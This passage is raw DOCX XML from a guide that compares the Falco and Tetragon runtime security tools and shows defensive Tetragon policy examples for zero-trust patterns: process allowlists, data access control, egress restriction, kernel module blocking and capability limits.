      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Compliance frameworks you're targeting are well-served by Falco evidence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You value CNCF Graduated maturity level (Falco has it; Tetragon is Incubating).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">14.3 When Tetragon Is Better</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You need ENFORCEMENT. This is the distinctive advantage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You're already running Cilium — ecosystem coherence.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You want Kubernetes-native policy via CRDs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Process lineage is central to your detection model.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You have modern kernels (5.7+) with BPF LSM.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You're pursuing zero-trust runtime security.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You want GitOps workflow for policies (CRDs fit naturally).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">14.4 Running Both</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A subtle but important point: YOU CAN RUN BOTH. Many organizations do. Why?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">14.4.1 Different Strengths</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Falco's mature rule set covers broad detection well. Tetragon's enforcement is distinctive. Together: comprehensive detection + surgical enforcement where needed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">14.4.2 Defense in Depth</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Two independent systems with different architectures mean one can catch what the other misses. Important for high-security environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">14.4.3 Migration Path</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Starting with Falco, adding Tetragon later — natural evolution as security needs mature.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">14.4.4 Different Teams, Different Tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SOC team prefers Falco (familiar alerting). Platform team adopts Tetragon (K8s-native). Coexistence accommodates both.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">14.4.5 Cost of Running Both</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Two DaemonSets = more resources. Two sets of rules to maintain. Two alert streams. Not trivial. Most orgs eventually consolidate to one primary tool — but the transition period can legitimately involve both.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">14.5 Direct Competitive Positioning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Outside marketing: both projects compete for runtime security market share. Falco has the incumbency advantage (older, more adopted, CNCF Graduated). Tetragon has the architectural advantage (enforcement). Both are likely to coexist for years; consolidation isn't imminent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From a user perspective, this competition is healthy — both projects improve rapidly. Adoption of either is a defensible choice.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">14.6 The Vendor Play</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Worth noting: both projects have commercial vendors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">FALCO: Sysdig (original creators, CNAPP product).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TETRAGON: Isovalent / Cisco (commercial Cilium + Tetragon bundle).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Commercial offerings add:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Support contracts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Additional UIs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Managed rule maintenance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Integration with broader security platforms.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If you're buying commercial, evaluate the WHOLE PLATFORM, not just the runtime tool. Sysdig vs. Isovalent (Cisco) is a bigger question than Falco vs. Tetragon.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15</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Zero-Trust Runtime Patterns</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">15.1 The Zero-Trust Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Zero-trust is a security model that rejects the perimeter-based assumption. Traditional security: "inside the network = trusted." Zero-trust: "nothing is trusted by default; every action must be verified."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">For runtime: "don't trust that a running process is behaving correctly; verify every security-relevant action."</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tetragon enables runtime zero-trust through fine-grained enforcement policies. Every file access, every exec, every network connection can be policy-governed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">15.2 Pattern 1: Principle of Least Privilege</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Each workload should only be able to do what it NEEDS to do. Not what it CAN do by default:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Payment service should ONLY execute specific binaries</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># and read specific files. Anything else is suspicious.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TracingPolicyNamespaced</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payment-service-allowlist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  namespace: payments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"sys_execve"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 ["/app/payment-service"]</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Only the expected binary can exec. Any compromise that tries to exec anything else = terminated.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">15.3 Pattern 2: Data Access Controls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sensitive data access restricted to specific processes:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Customer data can only be read by</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># the specific service and backup agent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customer-data-access-control</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"security_file_open"</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"file"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"Prefix"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        values: ["/data/customers/"]</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        - "/app/customer-service"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        - "/app/backup-agent"</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-13  # EACCES</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">15.4 Pattern 3: Egress Control</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Restrict outbound connections at the process level:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Only the egress-proxy process can connect outside the cluster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restrict-outbound-connections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"tcp_connect"</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"sock"</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"NotDAddr"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        values: ["10.0.0.0/8", "192.168.0.0/16"]</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 ["/app/egress-proxy"]</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"Signal"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        argSig: 9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Any process other than the egress-proxy trying to connect outside private networks = killed. Complements Cilium network policies with process-level enforcement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">15.5 Pattern 4: Kernel Module Control</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kernel modules are a classic privilege-escalation vector. Restrict their loading:</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block-kernel-module-loads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"security_kernel_module_request"</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  # EPERM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">No process can load kernel modules. Ever. If something tries, it fails. Since production workloads shouldn't load modules, this is safe; attackers trying to escape the container find themselves blocked.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">15.6 Pattern 5: Capability Restriction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tetragon can enforce capability boundaries:</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restrict-capabilities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"cap_capable"</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matchCapabilities:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      - type: "Effective"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        operator: "In"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        values: ["CAP_SYS_ADMIN", "CAP_NET_ADMIN"]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      matchBinaries:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      - operator: "NotIn"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        values: ["/app/admin-tool"]</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"Override"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        argError: -1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If a process OTHER than admin-tool tries to use CAP_SYS_ADMIN or CAP_NET_ADMIN, the capability check fails. Effective capability reduction at runtime.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">15.7 The Composability Advantage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">These patterns COMPOSE. A zero-trust runtime combines multiple policies:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Process allowlist (only expected binaries run).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Data access control (only specific files readable).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Egress restriction (specific network destinations).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Module load block (no kernel extension attacks).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Capability control (no unauthorized privilege use).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Together: a hardened runtime where the attacker, even if they compromise the application, can't:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run new binaries.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Read unauthorized data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exfiltrate anywhere.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Escape the container.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Escalate privileges.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Each path closed. Defense in depth at its fullest.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
